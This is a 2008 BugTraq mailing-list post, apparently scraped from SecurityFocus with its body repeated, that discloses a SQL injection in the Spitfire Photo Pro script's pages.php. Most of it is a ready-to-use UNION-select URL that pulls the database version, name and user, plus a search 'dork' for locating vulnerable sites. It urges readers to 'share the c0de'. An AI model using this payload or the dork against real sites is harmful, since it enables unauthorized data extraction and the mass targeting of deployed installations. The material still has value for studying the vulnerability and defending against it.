BugTraq
Back to list
|
Post reply
spitfirephoto Pro pages.php Sql Injection
Oct 31 2008 04:18AM
beenudel1986 gmail com
################################################################
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986 (at) gmail (dot) com [email concealed]
#
# Share the c0de!
#
################################################################
#
# Title: spitfirephoto Pro pages.php Sql Injection
#
# Vendor: http://http://www.spitfirephoto.com/ ( Paid Script )
#
#
###########################################################
#
# d0rk:Powered by Spitfire Photo Pro
#
###########################################################
Live Demo:
http://localhost/sapientphoto/pages.php?pageId=6634+and+1=2+union+select
+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())--
###########################################################
#
# Bug discovered : 30 Oct.2008
###########################################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986 (at) gmail (dot) com [email concealed]
#
# Share the c0de!
#
################################################################
#
# Title: spitfirephoto Pro pages.php Sql Injection
#
# Vendor: http://http://www.spitfirephoto.com/ ( Paid Script )
#
#
###########################################################
#
# d0rk:Powered by Spitfire Photo Pro
#
###########################################################
Live Demo:
http://localhost/sapientphoto/pages.php?pageId=6634+and+1=2+union+select
+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())--
###########################################################
#
# Bug discovered : 30 Oct.2008
###########################################################
[ reply ]